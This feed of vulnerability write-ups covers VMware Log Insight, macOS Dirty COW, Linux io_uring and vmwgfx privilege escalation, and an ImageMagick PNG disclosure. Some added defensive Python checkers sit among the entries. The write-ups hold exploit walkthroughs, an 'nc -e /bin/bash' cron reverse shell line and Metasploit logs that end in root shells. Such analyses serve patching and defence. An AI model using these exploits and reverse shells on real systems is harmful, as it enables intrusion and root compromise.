Activity Feed
Technical Analysis
On 31 January 2023, security researcher James Horman and team from Horizon3.ai published a Technical Deep Dive on vulnerabilities that exist in VMware vRealize Log Insight and how to exploit them to get unauthenticated remote access to the application. Please read the blog VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive for all the technical details.
What makes this use case particularly interesting is the chaining of multiple vulnerabilities to achieve the unauthenticated RCE.
Basically, there are four vulnerabilities published in the VMware VMSA-2023-0001 security disclosure:
- CVE-2022-31706: VMware vRealize Log Insight Directory Traversal Vulnerability
- CVE-2022-31704: VMware vRealize Log Insight Broken Access Control Vulnerability
- CVE-2022-31710: VMware vRealize Log Insight Deserialization Vulnerability
- CVE-2022-31711: VMware vRealize Log Insight Information Disclosure Vulnerability
The analysis shows that three vulnerabilities, CVE-2022-31706, CVE-2022-31704 and CVE-2022-31711, are chained to achieve the RCE.
In a nutshell:
- CVE-2022-31704 is used to gain unauthorized access to the Apache Thrift server to execute commands. Apache Thrift is an RPC framework that allows client/server communication and is typically used to establish communication between components of the system.
- The Apache Thrift server in the VMware vRealize Log Insight application is vulnerable and can be accessed with a client to execute specific commands defined in the framework.
- In this scenario, two RPC commands are being exploited, remotePakDownloadCommand and pakUpgradeCommand, which allow for an unauthenticated upload of a malicious PAK file with an attached payload that can be extracted to any place on the filesystem using CVE-2022-31706, which allows for Directory Traversal.
- Last but not least, the remotePakDownloadCommand requires a node token to work. A node token is a guid that is unique per instance of Log Insight. This information is not readily available to an unauthenticated user. However, there are various Thrift RPC commands that leak the node token, including getConfig and getHealthStatus, which links back to the third one, CVE-2022-31711 – VMware vRealize Log Insight Information Disclosure Vulnerability.
Now let’s see in real-life practice how this vulnerability works…
First we need to install a vulnerable instance of VMware vRealize Log Insight, which you can download from this link.
You need to be registered as a customer or you can apply for a trial license before you can download the OVA.
Import the OVA in your favorite hypervisor application. I am using Oracle VirtualBox.
Please allocate enough memory and CPU (minimum 4 GB and 2 vCPU), otherwise your appliance will be dead slow and the exploit will fail due to lack of space in the /tmp directory.
Go through the setup of the appliance. This is all very straightforward.
If you have the appliance running, go to the POC at Github that has been created by the Horizon3.ai team.
Clone the repository.
Before you start executing the exploit, please install Thrift python support.
# pip3 install thrift
and install the thrift-compiler.
Not needed for the exploit to work, but it gives you the ability to generate thrift modules for other languages such as ruby.
# apt install thrift-compiler
The last thing that you need to do is to correct a small typo that the guys from Horizon3.ai made in their code.
Yeah, everybody makes mistakes, even these guys ;–)
Open VMSA-2023-0001.py with your favorite editor and go to the section below.
def remote_pak_download(client, node_token, http_server_address, http_server_port):
    command = Command()
    command.commandType = 9
    download_command = RemotePakDownloadCommand()
    download_command.sourceNodeToken = node_token
    # The remote system does not return an error if this url is incorrect.
    # It just silently fails
    download_command.requestUrl = f"http://{http_server_address}:{http_server_port}/exploit.tar"
    download_command.fileName = "exploit.pak"
    command.remotePakDownloadCommand = download_command
Change download_command.fileName = "exploit" to download_command.fileName = "exploit.pak" and save the file.
Now we are ready to run the exploit against our installed target.
- The exploit will gain access by obtaining the token.
- Next, it will create a malicious PAK file with the payload attached, which is a crontab file with a netcat command connecting back to your system.
- The PAK file gets uploaded and extracted using the vulnerable Apache Thrift server running on the Log Insight server.
- Run a netcat listener on your system to catch the netcat connection from the target system, triggered by the cron daemon after successful exploitation.
# python3 ./VMSA-2023-0001.py --target_address 192.168.100.92 --http_server_address 192.168.100.7 --http_server_port 1981 --payload_file payload --payload_path /etc/cron.d/exploit
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: 8984be67-2394-4da1-bf87-2635d558329d
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.100.92 - - [03/Feb/2023 17:19:02] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered

# nc -lnvp 8888
listening on [any] 8888 ...
connect to [192.168.100.7] from (UNKNOWN) [192.168.100.92] 42746
uname -a
Linux localhost 4.19.245-1.ph3 #1-photon SMP Thu Jun 2 02:30:39 UTC 2022 x86_64 GNU/Linux
whoami
root
cat /etc/issue
VMware vRealize Log Insight
cat /etc/photon-release
VMware Photon OS 3.0
PHOTON_BUILD_NUMBER=05f9d3d8d
If you log in to the appliance, you can find the exploit.pak in the /tmp directory and the cron file exploit created in the /etc/cron.d directory.
If you check the contents of the PAK file, you will see the ../../etc/crond.d/exploit file with the directory traversal.
root@localhost [ ~ ]# ls -l /tmp/*.pak
-rw-r--r-- 1 root root 122880 Feb 3 17:18 /tmp/exploit.pak
root@localhost [ ~ ]# ls -l /etc/cron.d/exploit
-rw-r--r-- 1 root root 51 Feb 3 12:24 /etc/cron.d/exploit
root@localhost [ ~ ]# cat /etc/cron.d/exploit
* * * * * root nc -e /bin/bash 192.168.100.7 8888
root@localhost [ ~ ]# tar -tvf/tmp/exploit.pak
-rw-r--r-- root/root 35768 2023-02-03 09:10 upgrade-image-8.10.2-21145187.rpm
-rw-r--r-- root/root 35768 2023-02-03 09:10 upgrade-driver
-rw-r--r-- root/root 35768 2023-02-03 09:10 eula.txt
-rw-r--r-- root/root 1926 2023-02-03 09:10 VMware-vRealize-Log-Insight.cert
-rw-r--r-- root/root 1790 2023-02-03 09:10 VMware-vRealize-Log-Insight.mf
tar: Removing leading `../../' from member names
-rw-r--r-- root/root 51 2023-02-03 12:24 ../../etc/cron.d/exploit
The example above shows that the exploit is pretty simple to weaponize and execute; however, there is a low probability of exploitation in the wild.
The main reason is that VMware vRealize Log Insight is typically not exposed to the public Internet, and the Thrift RPC ports 16520 through 16580 would need to be accessible for the exploit to work.
But from the inside, it is of course a very attractive target to exploit because it has tons of nice information on the network and servers ready to be disclosed to an attacker.
Mitigation
Please update VMware vRealize Log Insight to 8.10.2.
References
Horizon3.ai: VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive
VMware advisory
Horizon3.ai: POC
Credits
Credits go to the security researchers below that analyzed the vulnerabilities and discovered the RCE chain.
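The tar listing in this write-up shows the CVE-2022-31706 trick from the extraction side: a PAK member named ../../etc/cron.d/exploit that lands in /etc/cron.d. The following is an added example, not code from the post or from the Horizon3.ai PoC; it builds a constructed PAK-like tarball in memory and shows the check a PAK extractor needs, flagging members (including symlink and hardlink targets) that would resolve outside the extraction directory and refusing the whole archive if any do. All function names and the placeholder content are mine.

```python
import io
import os
import tarfile


def build_sample_pak() -> bytes:
    """Constructed PAK-like tar: a benign member plus one named like the
    ../../etc/cron.d/exploit entry in the listing (placeholder content)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in (("eula.txt", b"constructed eula\n"),
                           ("../../etc/cron.d/exploit", b"<constructed cron line>\n")):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def _escapes(dest: str, target: str) -> bool:
    """True if target, placed under dest, resolves to a path outside dest."""
    root = os.path.realpath(dest)
    resolved = os.path.realpath(os.path.join(root, target))
    return os.path.commonpath([root, resolved]) != root


def find_traversal_members(pak_bytes: bytes, dest: str = "/tmp/pak-extract") -> list:
    """Names of members that would land outside dest: ../ segments, absolute
    names, and symlink/hardlink targets that point out of the tree."""
    bad = []
    with tarfile.open(fileobj=io.BytesIO(pak_bytes), mode="r") as tar:
        for m in tar.getmembers():
            if os.path.isabs(m.name) or _escapes(dest, m.name):
                bad.append(m.name)
            elif m.issym() or m.islnk():
                # symlink targets are relative to the member's directory,
                # hardlink targets to the archive root
                base = os.path.dirname(m.name) if m.issym() else ""
                if os.path.isabs(m.linkname) or _escapes(dest, os.path.join(base, m.linkname)):
                    bad.append(m.name)
    return bad


def safe_extract(pak_bytes: bytes, dest: str) -> list:
    """Hardened extraction: refuse the whole archive if any member escapes."""
    bad = find_traversal_members(pak_bytes, dest)
    if bad:
        raise ValueError(f"refusing to extract, traversal members: {bad}")
    with tarfile.open(fileobj=io.BytesIO(pak_bytes), mode="r") as tar:
        tar.extractall(dest)
        return [m.name for m in tar.getmembers()]
```

The same check applied to a PAK pulled from /tmp on an appliance gives a quick triage signal: any member name it returns means the archive was built to write outside the upgrade directory.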
Technical Analysis
Description
This vulnerability is the macOS equivalent of the Dirty Cow vulnerability and allows an unprivileged user to execute code as root. The vulnerability on Linux is described as: “A race condition was found in the way the kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.”
Attacker Value & Exploitation
This issue was fixed in:
- tvOS 16.2
- macOS Monterey 12.6.2
- macOS Ventura 13.1
- macOS Big Sur 11.7.2
- iOS 15.7.2
- iPadOS 15.7.2
- iOS 16.2
- iPadOS 16.2
- watchOS 9.2.
Numerous recent versions of Apple products being affected makes this quite valuable for attackers. It’s not every day we see such a reliable LPE in current versions of macOS. The vuln requires user authentication to exploit and would pair nicely with a successful phishing attempt to compromise an entire macOS environment. A Metasploit module has been released for this vuln, making exploitation trivial; be sure to patch!
msf6 exploit(osx/local/mac_dirty_cow) > run
[*] Started reverse TCP handler on 172.16.199.1:4446
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Writing '/tmp/.wNDx86' (17204 bytes) ...
[*] Writing '/tmp/.TKIGnTw0l' (51392 bytes) ...
[*] Executing exploit '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.DfoZanro'
[*] Exploit result:
Testing for 10 seconds...
RO mapping was modified
[*] Running cmd: echo '/tmp/.wNDx86 & disown' | su
[*] Executing exploit (restoring) '/tmp/.TKIGnTw0l /etc/pam.d/su /tmp/.aclP0u'
[*] Exploit result:
Testing for 10 seconds...
RO mapping was modified
[+] Deleted /tmp/.wNDx86
[+] Deleted /tmp/.aclP0u
[+] Deleted /tmp/.DfoZanro
[+] Deleted /tmp/.TKIGnTw0l
[*] Command shell session 2 opened (172.16.199.1:4446 -> 172.16.199.130:49802) at 2023-02-01 16:10:54 -0500

options
/bin/sh: line 29: options: command not found
id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),12(everyone),20(staff),29(certusers),61(localaccounts),80(admin),33(_appstore),98(_lpadmin),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae),701(com.apple.sharepoint.group.1)
uname -a
Darwin msfusers-Mac.local 22.0.0 Darwin Kernel Version 22.0.0: Tue May 24 20:31:35 PDT 2022; root:xnu-8792.0.50.111.3~5/RELEASE_X86_64 x86_64
- News Article or Blog (https://www.metabaseq.com/imagemagick-zero-days/)
Technical Analysis
ImageMagick 7.1.0-49 is vulnerable to Information Disclosure by injecting a malicious PNG file.
“A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile, then the attacker can download the resized image which will come with the content of a remote file.”
At risk
ImageMagick 7.1.0-49
Mitigation
Patch to version 7.1.0-52 or higher
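The quoted description pins the trigger down to one thing: a textual chunk whose keyword is "profile". As an added example (not code from the post, Metabase Q or ImageMagick), this is a minimal PNG chunk walker that validates chunk CRCs and reports every tEXt/zTXt/iTXt chunk keyed "profile", which is what a file upload pipeline could check before handing an image to a vulnerable ImageMagick. The sample PNG and all function names are constructed for this example.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Encode one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png(keyword: bytes, text: bytes) -> bytes:
    """Constructed 1x1 grayscale PNG carrying a single tEXt chunk."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return (PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"tEXt", keyword + b"\x00" + text)
            + _chunk(b"IDAT", idat) + _chunk(b"IEND", b""))


def iter_chunks(png: bytes):
    """Yield (type, data) per chunk; reject bad signature, truncation or CRC."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        end = pos + 12 + length
        if end > len(png):
            raise ValueError(f"truncated {ctype!r} chunk")
        data = png[pos + 8:pos + 8 + length]
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != struct.unpack(">I", png[end - 4:end])[0]:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, data
        pos = end


def find_profile_text_chunks(png: bytes) -> list:
    """(type, keyword, text) for each textual chunk keyed 'profile', the
    condition under which ImageMagick 7.1.0-49 treats the text as a filename."""
    hits = []
    for ctype, data in iter_chunks(png):
        if ctype not in TEXT_CHUNKS:
            continue
        keyword, _, rest = data.partition(b"\x00")
        if keyword.lower() == b"profile":  # case-insensitive, to be conservative
            # zTXt: one method byte then zlib data; iTXt is returned raw
            text = zlib.decompress(rest[1:]) if ctype == b"zTXt" else rest
            hits.append((ctype.decode(), keyword.decode(), text))
    return hits
```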
Technical Analysis
Description
This vulnerability exists in the Linux kernel’s io_uring implementation. This vuln allows an attacker with a local account to corrupt system memory, crash the system or escalate privileges in order to spawn a root shell.
Attacker Value & Exploitation
GitHub user @jvoisin explained that user @minipli-oss wrote a neat exploit for CVE-2022-1043, and it has the following advantages over your everyday Linux LPE:
- No hardcoded offsets
- No ROP
- Architecture-agnostic-ish
- Bypasses all existing mitigations, even out-of-kernel-ones like grsecurity (for version older than the exploit of course, since this class of vulnerabilities is now mitigated there) and LKRG.
The only drawback is that it only works on v5.12-rc3 to v5.14-rc7, a fairly small subset of the Linux kernel.
If the system is vulnerable, exploitation is trivial. The neat, aforementioned exploit has been integrated into Metasploit, making getting a root shell a piece of cake:
msf6 auxiliary(scanner/ssh/ssh_login) > run rhosts=172.16.199.132 username=msfuser password=notpassword
[*] 172.16.199.132:22 - Starting bruteforce
[+] 172.16.199.132:22 - Success: 'msfuser:notpassword' 'uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux msfuser-virtual-machine 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (172.16.199.1:60829 -> 172.16.199.132:22) at 2023-02-01 10:59:16 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > use linux/local/cve_2022_1043_io_uring_priv_esc
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set lport 4447
lport => 4447
msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > run
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture:
[*] Started reverse TCP handler on 172.16.199.1:4447
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. > 1 CPU required, detected: 2
[*] Writing '/tmp/.5Z1IxJt0' (282 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045348 bytes) to 172.16.199.132
[+] Deleted /tmp/.5Z1IxJt0
[+] Deleted /tmp/.qfp5AH76BB
[*] Meterpreter session 2 opened (172.16.199.1:4447 -> 172.16.199.132:49236) at 2023-02-01 10:59:51 -0500
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.132
OS           : Ubuntu 22.04 (Linux 5.13.12-051312-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
Defensive Suggestions
Not much to say here other than don’t run a vulnerable kernel version, patch!
Technical Analysis
Description
This vulnerability enables Linux priv esc against VMware virtual machines with kernel 4.14-rc1 – 5.17-rc1 due to a VMware driver bug. Specifically, a use-after-free flaw was found in the Linux kernel’s vmw_execbuf_copy_fence_user function in drivers/gpu/drm/vmwgfx/vmwgfx_execbuf.c in vmwgfx, which allows an authenticated user to escalate privileges and spawn a root shell.
Attacker Value & Exploitability
Linux kernel 4.14 was released 12 November 2017 while 5.17 was released 20 March 2022. Although this vulnerability only affects VMware virtual machines, I would expect the attack surface to be rather large given the wide range of kernels affected – about 4.5 years of Linux kernel releases.
Exploitability requires user-level privileges; however, once those are obtained, exploitation is trivial given the Metasploit module written to exploit this vulnerability. Simply get a user session and run the exploit as demonstrated below:
msf6 auxiliary(scanner/ssh/ssh_login) > run rhosts=172.16.199.132 rport=4444 username=msfuser password=notpassword
[*] 172.16.199.132:22 - Starting bruteforce
[+] 172.16.199.132:22 - Success: 'msfuser:notpassword' 'uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux msfuser-virtual-machine 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 8 opened (172.16.199.1:55151 -> 172.16.199.132:22) at 2023-01-20 09:34:18 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 exploit(linux/local/vmwgfx_fd_priv_esc) > run session=8 rhosts=172.16.199.132 rport=4445
[!] SESSION may not be compatible with this module:
[!]  * incompatible session architecture:
[*] Started reverse TCP handler on 172.16.199.1:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. vmwgfx installed
[+] Original /bin/chfn backed up to /Users/jheysel/.msf4/loot/20230120093436_default_172.16.199.132_binchfn_034079.bin
[*] Uploading payload to /tmp/.6ntizxlWd8
[*] Writing '/tmp/.6ntizxlWd8' (282 bytes) ...
[*] Launching exploit...
[*] Sending stage (3045348 bytes) to 172.16.199.132
[+] Deleted /tmp/.oWt34mDG4b
[*] Meterpreter session 9 opened (172.16.199.1:4445 -> 172.16.199.132:36990) at 2023-01-20 09:34:45 -0500
[*] Replacing trojaned /bin/chfn with original
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.132
OS           : Ubuntu 22.04 (Linux 5.13.12-051312-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Defensive Suggestions
In order to protect yourself against exploitation of this vulnerability, ensure your Linux VM kernels are up to date and are only connected to the network where necessary.
If you’re absolutely unable to upgrade the kernel of a vulnerable machine, it is possible to prevent the vulnerable kernel module from loading; Red Hat demonstrates how to do that here: https://access.redhat.com/solutions/41278. However, this is a band-aid fix and promotes poor security posture; update the kernel whenever possible.
- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)